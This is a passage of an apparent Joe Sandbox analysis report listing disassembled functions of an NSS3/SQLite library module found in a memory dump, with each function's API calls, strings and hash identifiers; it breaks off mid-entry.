                                                                                • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CF3DEC4
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF3DECD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$_byteswap_ulong
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 2339628231-598938438
                                                                                • Opcode ID: c96f447278088d5d38f3da8e02fe0a42af9b71ef2d34b5a582b467048614062f
                                                                                • Instruction ID: 7498a65276e37afea1474f33d6b2b7f74c252c7d0d636c333a9bb5b12e424b9a
                                                                                • Opcode Fuzzy Hash: c96f447278088d5d38f3da8e02fe0a42af9b71ef2d34b5a582b467048614062f
                                                                                • Instruction Fuzzy Hash: 27A1F471614221AFD711CF29C880B6BBBF5AF85308F15992DE88D8BA41D730E955CBD2
                                                                                Function 6CFFEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6CFFEE0B
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFFEEE1
                                                                                  • Part of subcall function 6CFF1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CFF1D7E
                                                                                  • Part of subcall function 6CFF1D50: EnterCriticalSection.KERNEL32(?), ref: 6CFF1D8E
                                                                                  • Part of subcall function 6CFF1D50: PR_Unlock.NSS3(?), ref: 6CFF1DD3
                                                                                • TlsGetValue.KERNEL32 ref: 6CFFEE51
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFFEE65
                                                                                • PR_Unlock.NSS3(?), ref: 6CFFEEA2
                                                                                • free.MOZGLUE(?), ref: 6CFFEEBB
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFFEED0
                                                                                • PR_Unlock.NSS3(?), ref: 6CFFEF48
                                                                                • free.MOZGLUE(?), ref: 6CFFEF68
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFFEF7D
                                                                                • PK11_DoesMechanism.NSS3(?,?), ref: 6CFFEFA4
                                                                                • free.MOZGLUE(?), ref: 6CFFEFDA
                                                                                • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CFFF055
                                                                                • free.MOZGLUE(?), ref: 6CFFF060
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                • String ID:
                                                                                • API String ID: 2524771861-0
                                                                                • Opcode ID: f77e0143628cbc4547ee94ae372c2f7e84e941fb7a2d23c3d494f68070c2c389
                                                                                • Instruction ID: 9d9110d6c0b42e0937279c4b1a3d467d8478945f4cf8f36dbbf9f355dcf53684
                                                                                • Opcode Fuzzy Hash: f77e0143628cbc4547ee94ae372c2f7e84e941fb7a2d23c3d494f68070c2c389
                                                                                • Instruction Fuzzy Hash: 408193B1A00209AFEF00DFA5EC81BDE7BB5FF08308F054024E919A3651E771E925CBA1
                                                                                Function 6CFC4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_SignatureLen.NSS3(?), ref: 6CFC4D80
                                                                                • PORT_Alloc_Util.NSS3(00000000), ref: 6CFC4D95
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFC4DF2
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFC4E2C
                                                                                • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CFC4E43
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFC4E58
                                                                                • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CFC4E85
                                                                                • DER_Encode_Util.NSS3(?,?,6D1105A4,00000000), ref: 6CFC4EA7
                                                                                • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CFC4F17
                                                                                • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CFC4F45
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFC4F62
                                                                                • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CFC4F7A
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFC4F89
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFC4FC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                • String ID:
                                                                                • API String ID: 2843999940-0
                                                                                • Opcode ID: 1ac5de30223423b030f715ccafb2cb56f7bf95f4f1622c32c8d0df6fe1db6955
                                                                                • Instruction ID: 42c4abea84860f54553aae3909891114fd5b425559ceafe2706de3a09cfa04d7
                                                                                • Opcode Fuzzy Hash: 1ac5de30223423b030f715ccafb2cb56f7bf95f4f1622c32c8d0df6fe1db6955
                                                                                • Instruction Fuzzy Hash: 37818F72B08302AFE701CF65DC40B6BBBE8AB84358F158529F958DB641E771E904CB93
                                                                                Function 6D005C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6D005C9B
                                                                                • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6D005CF4
                                                                                • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6D005CFD
                                                                                • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6D005D42
                                                                                • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6D005D4E
                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D005D78
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D005E18
                                                                                • TlsGetValue.KERNEL32 ref: 6D005E5E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D005E72
                                                                                • PR_Unlock.NSS3(?), ref: 6D005E8B
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CFFF854
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CFFF868
                                                                                  • Part of subcall function 6CFFF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CFFF882
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(04C483FF,?,?), ref: 6CFFF889
                                                                                  • Part of subcall function 6CFFF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CFFF8A4
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CFFF8AB
                                                                                  • Part of subcall function 6CFFF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CFFF8C9
                                                                                  • Part of subcall function 6CFFF820: free.MOZGLUE(280F10EC,?,?), ref: 6CFFF8D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                • String ID: d$tokens=[0x%x=<%s>]
                                                                                • API String ID: 2028831712-1373489631
                                                                                • Opcode ID: b34ee68fb9dc37717548bf646cda6e68032c3f3a295f9de48fb51838dacb86c2
                                                                                • Instruction ID: 23455d8e7517da3d4f373460ccf01e6c2514bb835f304cc854e7a32df35d2c55
                                                                                • Opcode Fuzzy Hash: b34ee68fb9dc37717548bf646cda6e68032c3f3a295f9de48fb51838dacb86c2
                                                                                • Instruction Fuzzy Hash: AF71C5B8E04106BBFB159B24ED49B7E36B9FF45308F044035E9099B242EB71E915CB92
                                                                                Function 6D041D10 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D041D6B
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6D041D75
                                                                                • PORT_ZAlloc_Util.NSS3(00000028), ref: 6D041DC4
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6D041DFC
                                                                                • PK11_CreateContextBySymKey.NSS3(00000000,82000104,?,?), ref: 6D041EB1
                                                                                • PK11_CreateContextBySymKey.NSS3(00000000,82000105,?,?), ref: 6D041ECE
                                                                                • PK11_FreeSymKey.NSS3 ref: 6D041EE0
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6D041EF9
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D041F0A
                                                                                • PK11_DestroyContext.NSS3(?,00000001), ref: 6D041F1C
                                                                                • free.MOZGLUE(00000000), ref: 6D041F25
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$Context$Free$CreateDestroy$Alloc_ErrorUtilfreememcpy
                                                                                • String ID: iv
                                                                                • API String ID: 3943584448-1283462680
                                                                                • Opcode ID: 88153bf7d365dea184a6bd3a04e97c176cf537658baa79000ac8e82101011468
                                                                                • Instruction ID: 2dd833f00dc274ac2c99da7080dc77552e79a6da3cbed584b71420a0393711fa
                                                                                • Opcode Fuzzy Hash: 88153bf7d365dea184a6bd3a04e97c176cf537658baa79000ac8e82101011468
                                                                                • Instruction Fuzzy Hash: F76190B5A08201EBE715DF15DC40FABB7E8EF88304F05852DF99887251E730E965CBA2
                                                                                Function 6CFF6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CFF781D,00000000,6CFEBE2C,?,6CFF6B1D,?,?,?,?,00000000,00000000,6CFF781D), ref: 6CFF6C40
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CFF781D,?,6CFEBE2C,?), ref: 6CFF6C58
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CFF781D), ref: 6CFF6C6F
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CFF6C84
                                                                                • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CFF6C96
                                                                                  • Part of subcall function 6CFA1240: TlsGetValue.KERNEL32(00000040,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA1267
                                                                                  • Part of subcall function 6CFA1240: EnterCriticalSection.KERNEL32(?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA127C
                                                                                  • Part of subcall function 6CFA1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA1291
                                                                                  • Part of subcall function 6CFA1240: PR_Unlock.NSS3(?,?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA12A0
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CFF6CAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                • API String ID: 4221828374-3736768024
                                                                                • Opcode ID: 71bc0b18c752e10493dbd6b8540b357aa4000ba75fa1f0c05143b8511ce2845a
                                                                                • Instruction ID: 439acf1fabb703a319fc764cfeeb1d918f9a4b6eeb37812a815ae12fece8151f
                                                                                • Opcode Fuzzy Hash: 71bc0b18c752e10493dbd6b8540b357aa4000ba75fa1f0c05143b8511ce2845a
                                                                                • Instruction Fuzzy Hash: 4D01F2A1B4232167F60027796C5AF27355DDF8514AF140131FF58E01A2EFE2E51640B6
                                                                                Function 6CFAACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 786543732-0
                                                                                • Opcode ID: 70885f5d9365abd680f13787afd15f866d0f058586752d3db30ea9da70655fc7
                                                                                • Instruction ID: a81d771d91d3169a9cf993268f03d5c434a82393f880e835bda989401aba27d0
                                                                                • Opcode Fuzzy Hash: 70885f5d9365abd680f13787afd15f866d0f058586752d3db30ea9da70655fc7
                                                                                • Instruction Fuzzy Hash: 0A51AFB1901116CBEB00DF94ED827AFF7B5EB46308F140129D915A3600E7B2A95ACFE2
                                                                                Function 6CFEADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CFEADE6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFEAE17
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFEAE29
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFEAE3F
                                                                                • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CFEAE78
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFEAE8A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFEAEA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: L_strncpyzPrint$L_strcatn
                                                                                • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                • API String ID: 332880674-605059067
                                                                                • Opcode ID: 9352148266067b1c0c73ce4e152a9454ea34fae12c9e1e6f619f471b4aaaa2aa
                                                                                • Instruction ID: c6adef92000cf1e88da0c155ef677528339d5dab7abf6386ce9c489b8d513c3e
                                                                                • Opcode Fuzzy Hash: 9352148266067b1c0c73ce4e152a9454ea34fae12c9e1e6f619f471b4aaaa2aa
                                                                                • Instruction Fuzzy Hash: FE311872900204BBEB10DF55ED86BAF3BB5EB4A309F054029F5196B252DBB49904CBA2
                                                                                Function 6D084C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_value_text16.NSS3(?), ref: 6D084CAF
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D084CFD
                                                                                • sqlite3_value_text16.NSS3(?), ref: 6D084D44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text16$sqlite3_log
                                                                                • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                • API String ID: 2274617401-4033235608
                                                                                • Opcode ID: c6069033e231b674ddfe3388458b252d64f8d9fec4d8f9322cedac7b174dc462
                                                                                • Instruction ID: b8618e4d84f7541b011c48e199501bee8eb8226cc3664650d5df7957bcff3936
                                                                                • Opcode Fuzzy Hash: c6069033e231b674ddfe3388458b252d64f8d9fec4d8f9322cedac7b174dc462
                                                                                • Instruction Fuzzy Hash: FF3127B2E14A52BBFF054A24A8007B9B3AFB78E314F45412AD4244B35BDB61E81683D3
                                                                                Function 6CFE2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_InitPIN), ref: 6CFE2DF6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE2E24
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE2E33
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE2E49
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CFE2E68
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CFE2E81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                • API String ID: 1003633598-1777813432
                                                                                • Opcode ID: efef950e9e34fdc53d9f4153c1ff6390388c5b33120c50e4052574b943597c62
                                                                                • Instruction ID: bd36945a7d64053de30a3cac0dd77708fa54196e29a2111ee477b0e3a7944e95
                                                                                • Opcode Fuzzy Hash: efef950e9e34fdc53d9f4153c1ff6390388c5b33120c50e4052574b943597c62
                                                                                • Instruction Fuzzy Hash: D0315AB1901215FFEB10DB55ED4AB9F3775EB4A31CF084025F918A7252EBB18904CBA2
                                                                                Function 6D082D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_initialize.NSS3 ref: 6D082D9F
                                                                                  • Part of subcall function 6CF3CA30: EnterCriticalSection.KERNEL32(?,?,?,6CF9F9C9,?,6CF9F4DA,6CF9F9C9,?,?,6CF6369A), ref: 6CF3CA7A
                                                                                  • Part of subcall function 6CF3CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CF3CB26
                                                                                • sqlite3_exec.NSS3(?,?,6D082F70,?,?), ref: 6D082DF9
                                                                                • sqlite3_free.NSS3(00000000), ref: 6D082E2C
                                                                                • sqlite3_free.NSS3(?), ref: 6D082E3A
                                                                                • sqlite3_free.NSS3(?), ref: 6D082E52
                                                                                • sqlite3_mprintf.NSS3(6D0EAAF9,?), ref: 6D082E62
                                                                                • sqlite3_free.NSS3(?), ref: 6D082E70
                                                                                • sqlite3_free.NSS3(?), ref: 6D082E89
                                                                                • sqlite3_free.NSS3(?), ref: 6D082EBB
                                                                                • sqlite3_free.NSS3(?), ref: 6D082ECB
                                                                                • sqlite3_free.NSS3(00000000), ref: 6D082F3E
                                                                                • sqlite3_free.NSS3(?), ref: 6D082F4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                • String ID:
                                                                                • API String ID: 1957633107-0
                                                                                • Opcode ID: 2a59e760c2ff7fca9ab70b173bbe5c1c46575f70dbb4676f2fd856d80adf35ee
